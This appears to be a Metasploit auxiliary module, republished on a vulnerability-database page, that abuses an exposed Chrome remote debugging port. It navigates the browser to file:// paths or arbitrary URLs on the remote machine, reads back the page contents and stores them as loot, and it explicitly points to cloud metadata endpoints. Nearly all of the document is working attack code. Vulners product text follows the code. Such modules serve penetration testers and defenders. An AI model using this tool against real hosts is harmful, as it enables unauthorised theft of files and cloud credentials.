##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'eventmachine'
require 'faye/websocket'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Chrome Debugger Arbitrary File Read / Arbitrary Web Request',
'Description' => %q{
This module uses the Chrome Debugger's API to read
files off the remote file system, or to make web requests
from a remote machine. Useful for cloud metadata endpoints!
},
'Author' => [
'Adam Baldwin (Evilpacket)', # Original ideas, research, proof of concept, and msf module
'Nicholas Starke (The King Pig Demon)' # msf module
],
'DisclosureDate' => '2019-09-24',
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(9222),
OptString.new('FILEPATH', [false, 'File to fetch from remote machine.']),
OptString.new('URL', [false, 'Url to fetch from remote machine.']),
OptInt.new('TIMEOUT', [true, 'Time to wait for response', 10])
]
)
deregister_options('Proxies')
deregister_options('VHOST')
deregister_options('SSL')
end
def run
if (datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty?) && (datastore['URL'].nil? || datastore['URL'].empty?)
print_error('Must set FilePath or Url')
return
end
res = send_request_cgi({
'method' => 'GET',
'uri' => '/json'
})
if res.nil?
print_error('Bad Response')
return
end
data = JSON.parse(res.body).pop
EM.run do
file_path = datastore['FILEPATH']
url = datastore['URL']
if file_path
fetch_uri = "file://#{file_path}"
else
fetch_uri = url
end
print_status("Attempting Connection to #{data['webSocketDebuggerUrl']}")
unless data.key?('webSocketDebuggerUrl')
fail_with(Failure::Unknown, 'Invalid JSON')
end
driver = Faye::WebSocket::Client.new(data['webSocketDebuggerUrl'])
driver.on :open do
print_status('Opened connection')
id = rand(1024 * 1024 * 1024)
@succeeded = false
EM::Timer.new(1) do
print_status("Attempting to load url #{fetch_uri}")
driver.send({
'id' => id,
'method' => 'Page.navigate',
'params' => {
url: fetch_uri
}
}.to_json)
end
EM::Timer.new(3) do
print_status('Sending request for data')
driver.send({
'id' => id + 1,
'method' => 'Runtime.evaluate',
'params' => {
'expression' => 'document.documentElement.outerHTML'
}
}.to_json)
end
end
driver.on :message do |event|
print_status('Received Data')
data = JSON.parse(event.data)
if data['result']['result']
loot_path = store_loot('chrome.debugger.resource', 'text/plain', rhost, data['result']['result']['value'], fetch_uri, 'Resource Gathered via Chrome Debugger')
print_good("Stored #{fetch_uri} at #{loot_path}")
@succeeded = true
end
end
EM::Timer.new(datastore['TIMEOUT']) do
EventMachine.stop
fail_with(Failure::Unknown, 'Unknown failure occurred') unless @succeeded
end
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation